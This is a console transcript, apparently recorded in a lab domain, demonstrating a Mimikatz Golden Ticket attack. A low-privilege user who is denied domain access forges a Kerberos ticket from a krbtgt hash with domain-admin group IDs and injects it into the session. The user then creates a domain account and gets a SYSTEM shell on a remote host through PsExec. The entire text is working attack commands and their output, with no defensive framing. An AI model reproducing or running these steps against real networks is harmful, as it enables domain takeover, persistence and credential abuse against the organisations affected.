Mimikatz Golden Ticket
C:Temp>whoami /USER
USER INFORMATION
----------------
User Name SID
=============== =============================================
testdomainuser S-1-5-21-3838653977-3010990090-570996099-1122
C:Temp>PsExec.exe WIN-8D3KWV0CV4T.TEST.LOCAL -s cmd
PsExec v2.0 - Execute processes remotely
Copyright (C) 2001-2013 Mark Russinovich
Sysinternals - www.sysinternals.com
Couldn't access WIN-8D3KWV0CV4T.TEST.LOCAL:
Access is denied.
C:Temp>net user newuser newpassword /add /domain
The request will be processed at a domain controller for domain test.local.
System error 5 has occurred.
Access is denied.
C:Temp>mimikatz
.#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Mar 17 2014 22:27:23)
.## ^ ##.
## / ## /* * *
## / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
'## v ##' http ://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 14 modules * * */
mimikatz # kerberos::golden /admin:Guest /domain:TEST.LOCAL /sid:S-1-5-21-3838653977-3010990090-570996099 /krbtgt:C1E209654807223D8CB17376FCB70E53 /ticket:ticket.krb /id:500 /groups:513,512,520,518,519
Admin : Guest
Domain : TEST.LOCAL
SID : S-1-5-21-3838653977-3010990090-570996099
User Id : 500
Groups Id : *513 512 520 518 519
krbtgt : c1e209654807223d8cb17376fcb70e53
-> Ticket : ticket.krb
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Final Ticket Saved to file !
mimikatz # kerberos::purge
Ticket(s) purge for current session is OK
mimikatz # kerberos::ptt ticket.krb
Ticket 'ticket.krb' successfully submitted for current session
mimikatz # exit
Bye!
C:Temp>net user newuser newpassword /add /domain
The request will be processed at a domain controller for domain test.local.
The command completed successfully.
C:Temp>PsExec.exe WIN-8D3KWV0CV4T.TEST.LOCAL -s cmd
PsExec v2.0 - Execute processes remotely
Copyright (C) 2001-2013 Mark Russinovich
Sysinternals - www.sysinternals.com
Microsoft Windows [‚ҐабЁп 6.0.6001]
(C) Љ®аЇ®а жЁп Њ ©Єа®б®дв, 2006. ‚ᥠЇа ў § йЁйҐл.
C:Windowssystem32>whoami
nt authoritysystem
C:Windowssystem32>